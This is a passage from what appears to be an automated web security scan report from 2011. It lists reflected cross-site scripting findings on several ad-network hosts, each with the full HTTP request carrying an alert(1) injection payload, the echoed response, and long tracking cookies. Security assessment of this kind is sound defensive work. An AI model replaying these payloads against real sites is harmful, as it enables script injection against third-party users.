User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=1989E06E-70CA-11E0-8B1B-AA0011BCA051; cluid=-12035860971305125961969; imprs=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1515

konaSafe(function(){
reJsonResponse({"AutoReport":{},"konaLat":"32.7825012","konaLon":"-96.8207016","konaPostalCode":"75207","publisherParams":{"all_except":"1","infoUnit.dc_open_new_win":"yes","tags_
...[SNIP]...
cardresearch.com/beacon.js"}]});
teUrl='http://te10.kontera.com/ContentLink/ContentLink?publisherId=134803&layout=adlinks&sId=&cb=1305200317&creative=L&cn=us';
konaTweakMode=620822530;
konaRequestId="099c70"-alert(1)-"e6f81577124";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&dc_aff_id=");
onKonaRetur
...[SNIP]...

4.113. http://lfov.net/webrecorder/g/chimera.js [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Issue detail

The value of the vid request parameter is copied into the HTML document as plain text between tags. The payload 8aecd<img%20src%3da%20onerror%3dalert(1)>a8888d3a2d5 was submitted in the vid parameter. This input was echoed as 8aecd<img src=a onerror=alert(1)>a8888d3a2d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /webrecorder/g/chimera.js?vid=null8aecd<img%20src%3da%20onerror%3dalert(1)>a8888d3a2d5 HTTP/1.1
Host: lfov.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE="null8aecd<img src=a onerror=alert(1)>a8888d3a2d5"; Expires=Fri, 11-May-2012 12:10:32 GMT
Content-Length: 63
Date: Thu, 12 May 2011 12:10:32 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='null8aecd<img src=a onerror=alert(1)>a8888d3a2d5';


4.114. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89c73'%3balert(1)//a585ca03c5d was submitted in the admeld_callback parameter. This input was echoed as 89c73';alert(1)//a585ca03c5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match89c73'%3balert(1)//a585ca03c5d HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; dp_rec="{\"1\": 1304954972+ \"3\": 1305125819+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"594286\": [1305035434+ \"2214981f-6ad1-347f-b68c-65cac0743543\"+ 140741+ 69733+ 139]+ \"423816\": [1305035840+ \"562254c9-5bb8-3476-9992-adb6207f4e32\"+ 144852+ 85665+ 227]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"591269\": [1305125830+ \"TcqjuAAEHsEK5XEIPxlByw==\"+ 62899+ 25126+ 8064]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619519\": [1305033320+ \"8188923508912701641\"+ 4451+ 6017+ 1201]+ \"628850\": [1305126069+ \"57c14386-864e-359d-8fb4-c32422e3a406\"+ 11349+ 57595+ 3180]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1305033339+ \"7307077377628671859\"+ 4451+ 6017+ 1201]+ \"50347\": [1305034714+ \"f2cf7655-4055-39ab-b4a3-d0ded4a34a06\"+ 44698+ 62225+ 139]+ \"581293\": [1305035906+ \"99b5fa1e-4f3e-370e-924a-24b5b9838ca0\"+ 140741+ 69733+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"581049\": [1305035636+ \"5de90a2a-d278-31ea-a24a-0c203fa41504\"+ 140741+ 69733+ 227]}"; camp_freq_p1="eJzjkuG48plFgFli68lV71gUGDU+gmgDRgswn0uG4xVY9thxiOy5qxBZMJ9LgmP+YlYBRommzqVg2aZ/J4GyDBYMQJnpH5mBMgc6IDIHPm6By/xdBNLzpQ0i8+U3TI8IR8dGkMyqVpAMgwYDWFSY440zUPDW/yVIgiIcK8+yAp31+wuq6BSgKJPECzTRCx+YgKKPJyxAEf3+DeTA/8/mo4jOvgESfY4meu8AyNwtF369RRZdMR/k3Ml9p1FEd94HmTBr/lqEKADut2xQ"; io_freq_p1="eJzjkuY4HijAJrH15Kp3LAqMGh9BtAGTxbHjQJpLmONNqACjRFPnUqAkgwaDAYMFA1DwqytQ8EAHquATkMovbaiCXeFAwVWtqIIvhYGCt/4vQRG8GiHALPH7C6rgmkgBJokXaIK7rYGCjycsQBFc4AIU/P9sPorgeleg4JYLv94iC24DuXNy32kUwb0uQMFZ89ciBAEFMUmn"; segments_p1="eJwdUM1KAlEYZe6dxeWu5iF6g14jAnVRD+GuJ+gHG7GghIygoB5AcCBEGx0rLDMzFVoFRcH0n2OrciFO59zN4Xw/55zvXi1VIalttdaVWqrDFOAijdpdl1qrWiCdz1ovstHJvwjgWc4ChoGF6aQsHP/t1UxboYB0ugC6BamtfjvE/TFF0Sn5pEXMugxqK9CDMTXbM7CqIujhvgkroTi6CqmrHlEx2GSkW+Hy8iLgNg3o8MrKCUcrGWJ9ROxiWardWdCvY3q8+8yLEgBvCfXQp2fb3JUfUrJnzvAYuxqzfelREs/R2jTiG2qevmn9kwD9CNjeMA+99vlT5aJwSs/BiH8R9mnb2+G0/8fN8yYj3CSglEKdy9BqysjHLMMa83xonVt3pMWG9Q/+LG7L"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 12 May 2011 11:39:29 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 12-May-2011 11:39:09 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 765

document.write('<img width="0" height="0" src="http://tag.admeld.com/match89c73';alert(1)//a585ca03c5d?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1305632369&custom_user_segments=%2C11265%2C17154%2C49027%2C59012%2C50056%2C50185%2C17163%2C50060%2C49026%2C500
...[SNIP]...

4.115. http://r.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25886"><script>alert(1)</script>8c27d2a8f82 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=25886"><script>alert(1)</script>8c27d2a8f82&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C6%7C9%7C4%7C1002%7C6%7C1%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15104%7C15105%7C15104%7C15105%7C15104%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775; adImpCount=oZ2RNEVNFLw1rkIl8X-P-yLlEJpCYSMxdqNq6lvFdNFh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MB0Y7JvKfSWNYnBltaP_EmvZ3jqED7k2YniAtZPVqfFWyqMSMg2wplko20za_zfIcXaDNf6CpNnts8TY8puNrbeBKdSjyOjws--qAHMHtbI6SyKBbydkRUpjuoBRWw9N2QWlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYexXtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSurscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLNnm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib_dL8EW6T8qzMgGN-UfAL4hvOC7fCrKQjypg3ZZDmIIRdMbH4VAaTP3yeuIT8bUYpjNxWhaps5334qiA6przrOBR9dy7mebSJ94duif8USNC67lakY1-Wx08qAAHUQtknHQ7xnjMvY9ljRz8Oso1hdOAl8yAkjzMu60avymcp27zhmAaygIZH6vh6o5wNjgjNdonijTulYljYeiITtnJ-obiQEWW_mIpBZLcLt_p7SN9vijLbJjf63yiGSwbKyG2dGugnhWf2jLB_cEY-73f83M-Qp-ZlRKwcQuBR1ztGiFSZj4LpSPmviro5cgHdk9eJt4MMqelir0IqM1jmPswFFzniMTjL4-dEMDP4r05gYjUzZycDMwIM-JRZdaXayxbU-AwRV7xlAm5ebgZQKvg7WfQ1UAcQ-GE71_vlGriBwl0yRDK3jK3JAuWDuOfs2KJrs13LhVuZ9GXfqJdAYatFTpdnV7arjamYRVy18OpW4nYo4YOSWlJdDfSV-fwq8HgeaN-3cp1FzgjDVOVLZ2VhYwL507hxRulwL5vm7cb7KsO1XFt8hxAzJqAYOCL7WjL0qxTgxm3fdOYdOttFZUxr5r0A9mv0F_QBoXzpi8rJ_c6DrDzy9pG89s1Q06scIKHZgyDJezpNhgVkSmU0kpar5BAJuG6G30x3tmAb2j7nSNJ4ut2MaV0ROqJMzw9NFFerOKSq0jn7Z8ml_Aq0G6qyi-_p_3NfTE1kiDIdgNbUC9syknt2eSBNZW0WI7HO06yZy2SvSB5gCfomHd71CeO9uXWDgvZffEe1VrTUdxOH4gfGVkOqzE_jRzdjQRhmyVCwoc_2QRp83dWLTsWWFAIqAtnczfxrFIRAQH9jWHUPud-tHjVA42UgJXi7E-Ez_fNnbIdhDyg95Mh1WycRjhJXv8ATRtHD8vb9Vg5SwvqNhrNZsvJnUfvCegfWPkjFXygnPnoVxBMRnVTY50l5bdMYetqdZbuYYw5z5lUxbXkdIEwU2hncdLYoeK7ANErfukyrvNB8AfsR6D54cbJAyko95iDfbO-X1OEuSdYaVrz3olMX3vxG0LpmKD-Soh53aYJpCPcsWWbSJo-8gq8nYPQ6ByEPHScXR_eqXeoOaqn2ootB5duWe6vOtfx6TZyGJGsbGD1xkmmTSZiXiOf1UbISqo; fc=Son_Yybuxp_4VLqW1c6IRgpgpID-Wq7vfB3O6HP3oULbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOyzAmjEmfIrmEjGls5nEu5ZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; pf=VuSdOqHBBMMWoIrvMn_lMP-eLv8nBibtrh2G8vjmtdsh8DjSlN9aC82olgy91sxHfR8HsN28iFo6HdZJoYg638wOOBBuwSDcinuc09qjksp0U_b-1nMI4TNTMGgzSCi8Z_hcfr_LjPBbXWGr-7VM9h8ALQwqWImyohuBQ27Y8Xw0cbFZZKJtQQndzE8GAKdmqCjC1Wmwdc7KyhZThEI6g8GR1G8u2_QHuqkmg4cRHp75P-oeEBUVDf5VwU9xuwcSHhDFJb2XUqEkLs7Domz_q3w_15kKm0BgK3JfnZEKs8fymw6sA4DbktT-nyiWCSpzKjDia36pxc3U4tO78q_HETEnlSA2STvxexbY71jYrbn4WfHJhGxsiIx-9I1zygek7Pf4A_sSnTuIap-4wUTplqXPpupoZ2aAs6pg_7GbeM0kYG_OQnZuGm01WR15o5NPoS1LMOxRBcktX-fjO0PajgmdjeQBgubJJsY05jsV2l9NZFR3RH9LciXYxcTjJepHfLuMsKI6owruPhF3gPtvzLZ9utGbxF13SV_uKAl4HKsBjKyxKk2G3uw_IYoHmbxATRKbLxavAe3UnLjo4PmSoYSZ7iWo8G3Uu8TuFRx5fRaquBZLTyYvv3Ocb-7--J-VtemUKW9z2kPibwP3gpIns6cCJlO7-0c-0RDCVEYnDUx1i2LElPrZXgQ5Byxk5xNmzexDfMU0BdXw9_SkVC-SNLPKk0ap-tAMXcPQnUmauymyXWJrQVUJgzNmFh7ksHv8OiCkGDhtnY3d1dmbv-udxKiDQTuAB18iFba0UGQ3JYe5Hmk4ucjwm6TjB_9nil97jekIjc-C8BS-uf96oebtAJsE9VJeaYcwjgb-01TibpxqYVdIDX7t5imD4mPAVzRantfh3RXY5XPyQCFOvjBuvXa7BG0yK1vm2RoZoMQreNJPS7GobV7I1cjjbuZswrRZ8pR06vJUoctQlrIJHdmY0phHtKP0mry4AwYHuhrHwtX0hRtaylr7YhxxdojmJl3YDZfqAfbohofv2ZcpScTu7Mv1IaFGZ4TJyXyc3GA7cL-6MReM3fg-Tj3A4SJdGFfIYrH1TzHu0JALHFm29Lz18bNTc21I0stlz_0W7pAuJ_HPjicCNrlo8DjF_CF9jI3kgrT0QZ53DFCYuonDAxoqp153GKXwrRX9BLEvde6VV8zIDZwhAfybaduI4Tjh2o_ApS_PmBayZLHGouKushfucVUk7wDNGMmzj4GVEEX8f-rUMF1anLVD4v4W2G3qart9v0lUhUFtrwAgKmwYbDU6hcnQfk1tudLUowDkoLCasxWjkPLeTOwQyYfFRoGQ1P2wq9MRvhbae96eQc_QL8Y8Frg5X12BeQO3OjFTV291KS2RaPVPOOkGi1geUIVZG9OQnob9Bt0DOsV3G_HCir3Yg1skhTvQ4n3K65vFpt3xYbzFf8Q06hm-RooLiXjgmMQu3eHeZC5CTGrXgCx3rgAsBIoW_gNcvGPrpcTHNsQQMEhxzL-4TqRY8qS_hbJfkUANyjVcq-NSNhuTjXqndliQHUkRx6kaJj4rOszghpKbXwU

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:53 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:39:52 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=9215002402228905964&fpid=25886"><script>alert(1)</script>8c27d2a8f82&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.116. http://r.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f36b"><script>alert(1)</script>cf6a02d7684 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=4f36b"><script>alert(1)</script>cf6a02d7684&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C6%7C9%7C4%7C1002%7C6%7C1%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15104%7C15105%7C15104%7C15105%7C15104%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775; adImpCount=oZ2RNEVNFLw1rkIl8X-P-yLlEJpCYSMxdqNq6lvFdNFh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MB0Y7JvKfSWNYnBltaP_EmvZ3jqED7k2YniAtZPVqfFWyqMSMg2wplko20za_zfIcXaDNf6CpNnts8TY8puNrbeBKdSjyOjws--qAHMHtbI6SyKBbydkRUpjuoBRWw9N2QWlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYexXtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSurscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLN